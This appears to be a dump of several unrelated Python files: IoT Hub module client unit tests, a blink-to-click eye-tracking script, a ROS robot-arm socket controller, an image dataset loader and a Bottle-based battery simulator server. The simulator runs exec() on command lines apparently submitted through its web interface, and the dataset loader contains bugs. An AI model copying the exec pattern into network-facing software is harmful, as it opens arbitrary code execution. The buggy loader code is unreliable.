"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
client._receive_type = RECEIVE_TYPE_API
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_input_message_inbox", return_value=inbox_mock
)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_message_on_input(input_name="some_input", block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_method_request()")
class TestIoTHubModuleClientReceiveMethodRequest(
IoTHubModuleClientTestsConfig, SharedClientReceiveMethodRequestTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .send_method_response()")
class TestIoTHubModuleClientSendMethodResponse(
IoTHubModuleClientTestsConfig, SharedClientSendMethodResponseTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .get_twin()")
class TestIoTHubModuleClientGetTwin(IoTHubModuleClientTestsConfig, SharedClientGetTwinTests):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .patch_twin_reported_properties()")
class TestIoTHubModuleClientPatchTwinReportedProperties(
IoTHubModuleClientTestsConfig, SharedClientPatchTwinReportedPropertiesTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .receive_twin_desired_properties_patch()")
class TestIoTHubModuleClientReceiveTwinDesiredPropertiesPatch(
IoTHubModuleClientTestsConfig, SharedClientReceiveTwinDesiredPropertiesPatchTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - .invoke_method()")
class TestIoTHubModuleClientInvokeMethod(WaitsForEventCompletion, IoTHubModuleClientTestsConfig):
@pytest.mark.it("Begins a 'invoke_method' HTTPPipeline operation where the target is a device")
def test_calls_pipeline_invoke_method_for_device(self, client, http_pipeline):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
client.invoke_method(method_params, device_id)
assert http_pipeline.invoke_method.call_count == 1
assert http_pipeline.invoke_method.call_args[0][0] is device_id
assert http_pipeline.invoke_method.call_args[0][1] is method_params
@pytest.mark.it("Begins a 'invoke_method' HTTPPipeline operation where the target is a module")
def test_calls_pipeline_invoke_method_for_module(self, client, http_pipeline):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
client.invoke_method(method_params, device_id, module_id=module_id)
assert http_pipeline.invoke_method.call_count == 1
assert http_pipeline.invoke_method.call_args[0][0] is device_id
assert http_pipeline.invoke_method.call_args[0][1] is method_params
assert http_pipeline.invoke_method.call_args[1]["module_id"] is module_id
@pytest.mark.it(
"Waits for the completion of the 'invoke_method' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, http_pipeline_manual_cb
):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.invoke_method,
kwargs={"invoke_method_response": "__fake_invoke_method_response__"},
)
client_manual_cb.invoke_method(method_params, device_id, module_id=module_id)
@pytest.mark.it(
"Raises a client error if the `invoke_method` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, http_pipeline_manual_cb, pipeline_error, client_error
):
method_params = {"methodName": "__fake_method_name__"}
device_id = "__fake_device_id__"
module_id = "__fake_module_id__"
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=http_pipeline_manual_cb.invoke_method,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.invoke_method(method_params, device_id, module_id=module_id)
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - PROPERTY .on_message_received")
class TestIoTHubModuleClientPROPERTYOnMessageReceivedHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_message_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.INPUT_MSG
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - PROPERTY .on_method_request_received")
class TestIoTHubModuleClientPROPERTYOnMethodRequestReceivedHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_method_request_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.METHODS
@pytest.mark.describe(
"IoTHubModuleClient (Synchronous) - PROPERTY .on_twin_desired_properties_patch_received"
)
class TestIoTHubModuleClientPROPERTYOnTwinDesiredPropertiesPatchReceivedHandler(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYHandlerTests
):
@pytest.fixture
def handler_name(self):
return "on_twin_desired_properties_patch_received"
@pytest.fixture
def feature_name(self):
return pipeline_constant.TWIN_PATCHES
@pytest.mark.describe("IoTHubModule (Synchronous) - PROPERTY .connected")
class TestIoTHubModuleClientPROPERTYConnected(
IoTHubModuleClientTestsConfig, SharedIoTHubClientPROPERTYConnectedTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - OCCURANCE: Connect")
class TestIoTHubModuleClientOCCURANCEConnect(
IoTHubModuleClientTestsConfig, SharedIoTHubClientOCCURANCEConnectTests
):
pass
@pytest.mark.describe("IoTHubModuleClient (Synchronous) - OCCURANCE: Disconnect")
class TestIoTHubModuleClientOCCURANCEDisconnect(
IoTHubModuleClientTestsConfig, SharedIoTHubClientOCCURANCEDisconnectTests
):
pass
|
final.py
|
import pyautogui
from imutils import face_utils
from scipy.spatial import distance as dist
import cv2
from Camera import camera
import imutils
import dlib
import numpy as np
import time
import os
from get_key import k_check
from Feature import contour
from modelsNN import inception_v3 as gnet
LR = 1e-3
WIDTH = 250
from threading import Thread
HEIGHT = 250
i=3
MODEL_NAME="CNN-{}".format(i)
LOAD_MODEL = True
count=0
a = [1,0,0,0,0,0,0,0,0]
b = [0,1,0,0,0,0,0,0,0]
c = [0,0,1,0,0,0,0,0,0]
d = [0,0,0,1,0,0,0,0,0]
e = [0,0,0,0,1,0,0,0,0]
f = [0,0,0,0,0,1,0,0,0]
g = [0,0,0,0,0,0,1,0,0]
h = [0,0,0,0,0,0,0,1,0]
nk = [0,0,0,0,0,0,0,0,1]
FN="FACIAL_LM.dat"
dl=dlib.shape_predictor(FN)
#urlstream="http://192.168.1.2:8080/video"
cam=camera.VideoFeed()
contour=contour.Contour(dl)
face=camera.Face()
COUNTER = 0
detecor=face.cam()
EYE_THR = 0.3
EYE_CLOSE_FRAMES = 5
train_data=[]
STATE_CLICK=False
(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS["left_eye"]
(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS["right_eye"]
model = gnet(WIDTH, HEIGHT, 3, LR, output=9, model_name=MODEL_NAME)
if LOAD_MODEL:
model.load(MODEL_NAME)
print('loaded a previous model into inception_v3!!')
for i in list(range(4))[::-1]:
print(i+1)
time.sleep(.1)
print("Started..")
state_paused=False
COUNTER=0
def click():
pyautogui.click()
def click_mouse_action():
global COUNTER
global STATE_CLICK
if eye_ratio < EYE_THR:
COUNTER=COUNTER+1
if COUNTER > EYE_CLOSE_FRAMES:
if not STATE_CLICK:
STATE_CLICK = True
t = Thread(target=click,)
t.deamon = True
t.start()
else:
COUNTER = 0
STATE_CLICK = False
def choice2():
click_mouse_action()
print("looked R8 !! action took.....")
def choice1():
click_mouse_action()
print("looked left !! action took.....")
def eye_aspect_ratio(eye):
A = dist.euclidean(eye[1], eye[5])
B = dist.euclidean(eye[2], eye[4])
C = dist.euclidean(eye[0], eye[3])
ear = (A + B) / (2.0 * C)
return ear
while 1 and not state_paused:
frame=cam.getframe()
frame_2 = frame.copy()
framegray=cam.getframe(True)
coordpts=detecor(frame,0)
coordpts=contour.dots(frame,coordpts)
if coordpts is not None:
for point in coordpts:
cv2.circle(frame, tuple(point), 1, (0, 0, 255))
lefteye=coordpts[lStart:lEnd]
righteye=coordpts[rStart:rEnd]
lefteye=coordpts[lStart:lEnd]
righteye=coordpts[rStart:rEnd]
lefthull=cv2.convexHull(lefteye)
righthull=cv2.convexHull(righteye)
eye_ratio=eye_aspect_ratio(lefteye)
cv2.circle(frame, (int((righteye[0][0]+righteye[3][0])/2),int((righteye[0][1]+righteye[3][1])/2)), 1, (0, 0, 244), -1)
cv2.circle(frame, (int((lefteye[0][0]+lefteye[3][0])/2),int((lefteye[0][1]+lefteye[3][1])/2)), 1, (0, 0, 244), -1)
(x,y,w,h)=cv2.boundingRect(np.array([lefteye]))
(xr, yr, wr, hr) = cv2.boundingRect(np.array([righteye]))
off=10
roiL = imutils.resize(frame[y - off:y + off + h + off, x - off:x + w + off], width=250, height=250,
inter=cv2.INTER_CUBIC)
roiR = imutils.resize(frame[yr - off:yr + off + hr + off, xr - off:xr + wr + off], width=250, height=250,
inter=cv2.INTER_CUBIC)
roiL = cv2.resize(roiL, (250, 250))
roiR = cv2.resize(roiR, (250, 250))
roi_l = imutils.resize(frame_2[y-off:y+off+h+off,x-off:x+w+off], width=250, height=250,inter=cv2.INTER_CUBIC)
roi_r = imutils.resize(frame_2[yr-off:yr+off+hr+off,xr-off:xr+wr+off], width=250, height=250,inter=cv2.INTER_CUBIC)
roi_l_resized=cv2.resize(roi_l, (250, 250))
roi_r_resized = cv2.resize(roi_r, (250, 250))
# roi_lo=roi_l_resized
# roi_ro=roi_r_resized
roi_l_resized = cv2.cvtColor(roi_l_resized, cv2.COLOR_BGR2RGB)
roi_r_resized = cv2.cvtColor(roi_r_resized, cv2.COLOR_BGR2RGB)
if count>5:
prediction = model.predict([roi_r_resized.reshape(WIDTH,HEIGHT,3)])
np.round(prediction)
choice_pred_index = np.argmax(prediction)
print(choice_pred_index)
if choice_pred_index == 0:
## pyautogui.moveTo(598,570)
#pass
#choice1()
pass
elif choice_pred_index == 2:
## pyautogui.moveTo(196,586)
choice1()
pass
elif choice_pred_index == 4:
## pyautogui.moveTo(1203,597)
choice2()
pass
else:
pass
cv2.imshow("live feed - 1", roiL)
cv2.imshow("live feed - 2", roiR)
count=count+1
cv2.imshow("live feed",frame)
keys = k_check()
# p pauses game and can get annoying.
if 'p' in keys:
if not state_paused:
state_paused = True
time.sleep(1)
else:
state_paused=False
time.sleep(1)
k=cv2.waitKey(23) & 0xFF
if k is ord('q'):
cv2.destroyAllWindows()
break
if __name__=="__main__":
pass
|
HiwinRA605_socket_ros_test_20190625193603.py
|
#!/usr/bin/env python3
# license removed for brevity
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
##
import sys
import os
import numpy as np
import rospy
import matplotlib as plot
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import enum
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
state_feedback = 0
NAME = 'socket_server'
client_response = 0 #回傳次數初始值
point_data_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_cmd():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
def socket_client_arm_state(Arm_state):
global state_feedback
rospy.wait_for_service('arm_state')
try:
Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
state_feedback = Arm_state_client(Arm_state)
#pos_feedback_times = pos_feedback.response
return state_feedback
except rospy.ServiceException as e:
print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server 端-------
def point_data(req): ##接收策略端傳送位姿資料
global client_response,point_data_flag
pos.x = '%s'%req.x
pos.y = '%s'%req.y
pos.z = '%s'%req.z
pos.pitch = '%s'%req.pitch
pos.roll = '%s'%req.roll
pos.yaw = '%s'%req.yaw
point_data_flag = True
client_response = client_response + 1
return(client_response)
##----------Arm Mode-------------###
def Arm_Mode(req): ##接收策略端傳送手臂模式資料
socket_cmd.action = int('%s'%req.action)
socket_cmd.grip = int('%s'%req.grip)
socket_cmd.ra = int('%s'%req.ra)
socket_cmd.setvel = int('%s'%req.vel)
socket_cmd.setboth = int('%s'%req.both)
arm_mode_flag = True
return(1)
##-------Arm Speed Mode------------###
def Speed_Mode(req): ##接收策略端傳送手臂模式資料
socket_cmd.Speedmode = int('%s'%req.Speedmode)
speed_mode_flag = True
return(1)
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ##創建Server node
rospy.init_node(NAME)
a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##-----------socket client--------
def socket_client():
global Arm_feedback,data
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(s.recv(1024))
#start_input=int(input('開始傳輸請按1,離開請按3 : ')) #輸入開始指令
start_input = 1
if start_input==1:
while 1:
##---------------socket 傳輸手臂命令-----------------
if Arm_feedback == 0:
#-------選擇模式--------
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
s.send(data.encode('utf-8'))#socket傳送for python to translate str
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line
|
dataset.py
|
import os
import random
from Queue import Queue
from threading import Thread
import time
from PIL import Image
import numpy
def shuffle(data):
perm = range(len(data))
random.shuffle(perm)
shuffled = [data[i] for i in perm]
return shuffled
def load_image_file(data_dir, join_path=False, image_suffix='.jpg', label=None):
if not os.path.exists(data_dir):
return []
if label:
files = [f for f in os.listdir(data_dir) if f.endswith(image_suffix) and f.startswith(label)]
else:
files = [f for f in os.listdir(data_dir) if f.endswith(image_suffix)]
if join_path:
files = [os.path.join(data_dir, f) for f in files]
return shuffle(files)
def load_label(data_dir, delimiter='_', image_suffix='.jpg'):
files = load_image_file(data_dir, False, '.jpg')
labels = set()
for f in files:
label = f.split(delimiter)[0]
labels.add(label)
labels = list(labels)
labels.sort()
return labels, len(labels)
def dense_to_one_hot(labels_dense, num_classes):
"""Convert class labels from scalars to one-hot vectors."""
num_labels = labels_dense.shape[0]
index_offset = numpy.arange(num_labels) * num_classes
labels_one_hot = numpy.zeros((num_labels, num_classes))
labels_one_hot.flat[index_offset + labels_dense.ravel()] = 1
return labels_one_hot
# ==============================================================
'''Constants - Feel free to change'''
data_dir = 'test/data' # image directory
delimiter = '.'
label_names, num_classes = load_label(data_dir, delimiter)
data_rate=[0.8, 0.1, 0.1] # a list of train, validation, test data rate
# ==============================================================
def extract_label(filename, one_hot=False):
label = filename.split('/')[-1].split(delimiter)[0]
label_index = label_names.index(label)
if one_hot:
return dense_to_one_hot(numpy.array([label_index]), num_classes)[0]
return label_index
def load_files_by_class(data_dir, delimiter):
print('data_dir:%s, delimiter:%s' %(data_dir, delimiter))
label_names, num_classes = load_label(data_dir, delimiter)
files = [load_image_file(data_dir, join_path=True, label=l) for l in label_names]
counter = [len(f) for f in files]
return files, counter
def random_build(data_dir=data_dir, delimiter=delimiter):
files, counter = load_files_by_class(data_dir, delimiter)
dataset = [[], [], []]
for i, rate in enumerate(data_rate, start=0):
for j, f in enumerate(files, start=0):
random.shuffle(f)
end = int(rate * counter[j])
dataset[i].extend(f[: end])
train, validation, test = dataset
random.shuffle(train)
random.shuffle(validation)
random.shuffle(test)
print(len(train), len(validation), len(test))
return train, validation, test
def split_build(data_dir=data_dir, delimiter=delimiter):
files, counter = load_files_by_class(data_dir, delimiter)
train, validation, test = [], [], []
for i, f in enumerate(files, start=0):
random.shuffle(f)
start = int(data_rate[0] * counter[i])
train.extend(f[: start])
end = counter[i] - int(data_rate[2] * counter[i])
validation.extend(f[start: end])
test.extend(f[end: ])
# print('start:%d, end:%d' %(start, end))
random.shuffle(train)
random.shuffle(validation)
random.shuffle(test)
print(len(train), len(validation), len(test))
return train, validation, test
def read_image(files, num_worker_threads=5, size=(227, 227), one_hot=False):
input_queue = Queue()
for f in files:
input_queue.put(f)
# print('input queue size:%d' %(input_queue.qsize()))
output_queue = Queue()
def worker():
while not input_queue.empty():
filename = input_queue.get()
image = numpy.array(Image.open(filename).convert('RGB').resize(size))
# Convert from [0, 255] -> [0.0, 1.0]
image = image.astype(numpy.float32)
image = numpy.multiply(image, 1.0 / 255.0)
label = extract_label(filename, one_hot=one_hot)
output_queue.put((image, label))
input_queue.task_done()
for i in range(num_worker_threads): # start threads
worker_thread = Thread(target=worker)
worker_thread.daemon = True
worker_thread.start()
input_queue.join() # block until all tasks are done
images = []
labels = []
while not output_queue.empty():
image, label = output_queue.get()
images.append(image)
labels.append(label)
return numpy.array(images), numpy.array(labels)
class Dataset(object):
"""docstring for Dataset"""
def __init__(self, files):
super(Dataset, self).__init__()
self._files = shuffle(files)
self._num_examples = len(files)
self._epochs_completed = 0
self._index_in_epoch = 0
@property
def files():
return self._files
@property
def num_examples(self):
return self._num_examples
@property
def epochs_completed(self):
return self._epochs_completed
def num_epochs(self, batch_size):
"""Return the total epochs in this data set by given batch_size."""
return self._num_examples // batch_size
def next_batch_file(self, batch_size):
"""Return the next `batch_size` examples from this data set."""
start = self._index_in_epoch
self._index_in_epoch += batch_size
if self._index_in_epoch > self._num_examples:
# Finished epoch
self._epochs_completed += 1
# Shuffle the data
self._files = shuffle(self._files)
start = 0
self._index_in_epoch = batch_size
assert batch_size <= self._num_examples
end = self._index_in_epoch
return self._files[start:end]
def next_batch(self, batch_size, one_hot=True):
"""Return the next `batch_size` examples from this data set."""
batch_file = self.next_batch_file(batch_size)
return read_image(self.next_batch_file(batch_size), one_hot=one_hot)
def load_all(self, one_hot=True):
return read_image(self._files, one_hot=one_hot)
class DatasetQueue(Thread):
"""docstring for DatasetQueue"""
def __init__(self, dataset, batch_size=128, qsize=10):
super(DatasetQueue, self).__init__()
self._dataset = dataset
self._batch_size = batch_size
self._queue = Queue(qsize)
self._thread_stop = False
def run(self):
while not self._thread_stop:
print('queue size:%d' %(self._queue.qsize()))
images, labels = self._dataset.next_batch(self._batch_size)
self._queue.put((images, labels))
def stop(self):
self._thread_stop = True
def next_batch(self):
images, labels = self._queue.get()
return images, labels
|
app.py
|
import threading
import sys, os, time
import glob, json, argparse, copy
import socket, webbrowser
from wsgiref.simple_server import WSGIRequestHandler, make_server
from bottle import *
from serial_manager import SerialManager
from batterySimulator import TimeMachine
waitEvent = threading.Event()
tm = TimeMachine()
APPNAME = "TS_BatterySimulator"
VERSION = "0.1"
COMPANY_NAME = "com.bhl"
SERIAL_PORT = None #'COM1'
BITSPERSECOND = 9600
NETWORK_PORT = 4567
HARDWARE = 'x86' # also: 'beaglebone', 'raspberrypi'
CONFIG_FILE = "TS_BatterySimulator.conf"
GUESS_PREFIX = "no prefix"
graphDataLengthMax =128 #default max data length of the graph
pct = 0
quitFlag = False
def parseLines(f):
pySegs = []
for line in f:
if len(line.strip()) <=0:
continue
if line[0] != ' ' and line[0] !='\t':
if line != '':
pySegs.append(line)
else:
pySegs[-1] = pySegs[-1] + line
return pySegs
def CommandProcessor(e):
'''
execute command lines from webgui
'''
global pct,quitFlag
while True:
tm.status['paused'] = True
print('Waiting for event to start..')
event_is_set = e.wait()
tm.status['paused'] = False
print('Running...')
try:
f = open('currentCommandList.py','r')
lines = parseLines(f)
totalCount = len(lines)
f.close()
for i,line in enumerate(lines):
try:
exec(line)
except:
print('error in line:%s'%line)
pct = int((1.0+i)/totalCount * 100)
print('exec percentage: ' + str(pct) + '%')
e.wait()
if quitFlag:
print('quit signal captured!')
break
pct = 100
quitFlag = True
except:
print('error in exec')
print('command ended!')
e.clear()
def serialProcessor():
global quitFlag
RelayStatus=0
'''
process serial command and send response.
'V' // UART-command for receiving
'T' //UART-command for read temperature
'F' //UART-command for read flag
'R' //UART-command for read total voltage
'I' //UART-command for read total current
'C' //UART-command for close the relay
'O' //UART-command for open the relay
'P' //UART-command for receiving the PWM rate
'J' //UART-command for read time
'K' //UART-command for kill the simulation
'''
while True:
try:
chars = SerialManager.read_to('\r')
if len(chars) > 0:
print('Processing Command:' + chars)
stackNum = int(chars[1])
cellNum = int(chars[2:4])
#cellNum=int(chars[2])*10 + int(chars[3])
index = stackNum*tm.NumberOfCells+cellNum
#print "stackNum %d, cellNum %d, index %d" %(stackNum,cellNum,index)
if chars[0] == 'V':
SerialManager.write(str(tm.status['voltageList'][index])+ '\r')
elif chars[0] == 'B':
tm.bg[index].balanceRate = 1.0 * int(chars[4:])/100.0
#print 'balcenRate is:', tm.bg[index].balanceRate
elif chars[0] == 'T':
SerialManager.write(str(0)+ '\r')
elif chars[0] == 'R':
totalVoltage=sum(tm.status['voltageList'][:])
SerialManager.write(str(totalVoltage)+ '\r')
elif chars[0] == 'I':
totalCurrent=sum(tm.status['voltageList'][:])/tm.load
SerialManager.write(str(totalCurrent)+ '\r')
elif chars[0] == 'C':
RelayStatus=1
SerialManager.write(str(RelayStatus)+ '\r')
elif chars[0] == 'O':
RelayStatus=0
SerialManager.write(str(RelayStatus)+ '\r')
elif chars[0] == 'J':
SerialManager.write(str(tm.clock)+ '\r')
elif chars[0] == 'K':
quitFlag = True
else:
print 'Command Not Defined'
SerialManager.write('Command Not Defined'+ '\r')
time.sleep(0.08)
except:
print("error when processing command")
time.sleep(0.1)
def resources_dir():
"""This is to be used with all relative file access.
_MEIPASS is a special location for data files when creating
standalone, single file python apps with pyInstaller.
Standalone is created by calling from 'other' directory:
python pyinstaller/pyinstaller.py --onefile app.spec
"""
if hasattr(sys, "_MEIPASS"):
return sys._MEIPASS
else:
# root is one up from this file
return os.path.abspath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../'))
def storage_dir():
directory = ""
if sys.platform == 'darwin':
# from AppKit import NSSearchPathForDirectoriesInDomains
# # NSApplicationSupportDirectory = 14
# # NSUserDomainMask = 1
# # True for expanding the tilde into a fully qualified path
# appdata = path.join(NSSearchPathForDirectoriesInDomains(14, 1, True)[0], APPNAME)
directory = os.path.join(os.path.expanduser('~'), 'Library', 'Application Support', COMPANY_NAME, APPNAME)
elif sys.platform == 'win32':
directory = os.path.join(os.path.expandvars('%APPDATA%'), COMPANY_NAME, APPNAME)#C:\Users\oeshine\AppData\Roaming\com.bhl
else:
directory = os.path.join(os.path.expanduser('~'), "." + APPNAME)
if not os.path.exists(directory):
os.makedirs(directory)
return directory
class HackedWSGIRequestHandler(WSGIRequestHandler):
""" This is a heck to solve super slow request handling
on the BeagleBone and RaspberryPi. The problem is WSGIRequestHandler
which does a reverse lookup on every request calling gethostbyaddr.
For some reason this is super slow when connected to the LAN.
(adding the the IP and name of the requester in the /etc/hosts file
solves the problem but obviously is not practical)
"""
def address_string(self):
"""Instead of calling getfqdn -> gethostbyaddr we ignore."""
# return "(a requester)"
return str(self.client_address[0])
def run_with_callback(host, port):
""" Start a wsgiref server instance with control over the main loop.
This is a function that I derived from the bottle.py run()
"""
handler = default_app()
server = make_server(host, port, handler, handler_class=HackedWSGIRequestHandler)
server.timeout = 0.01
server.quiet = True
print "Persistent storage root is: " + storage_dir()
print "-----------------------------------------------------------------------------"
print "Bottle server starting up ..."
print "Serial is set to %d bps" % BITSPERSECOND
print "Point your browser to: "
print "http://%s:%d/ (local)" % ('127.0.0.1', port)
# if host == '':
# try:
# print "http://%s:%d/ (public)" % (socket.gethostbyname(socket.gethostname()), port)
# except socket.gaierror:
# # print "http://beaglebone.local:4444/ (public)"
# pass
print "Use Ctrl-C to quit."
print "-----------------------------------------------------------------------------"
print
# auto-connect on startup
global SERIAL_PORT
if not SERIAL_PORT:
SERIAL_PORT = SerialManager.match_device(GUESS_PREFIX, BITSPERSECOND)
SerialManager.connect(SERIAL_PORT, BITSPERSECOND)
# open web-browser
try:
webbrowser.open_new_tab('http://127.0.0.1:'+str(port))
pass
except webbrowser.Error:
print "Cannot open Webbrowser, please do so manually."
sys.stdout.flush() # make sure everything gets flushed
while 1:
try:
server.handle_request()
#tm.run()
except KeyboardInterrupt:
break
print "\nShutting down..."
SerialManager.close()
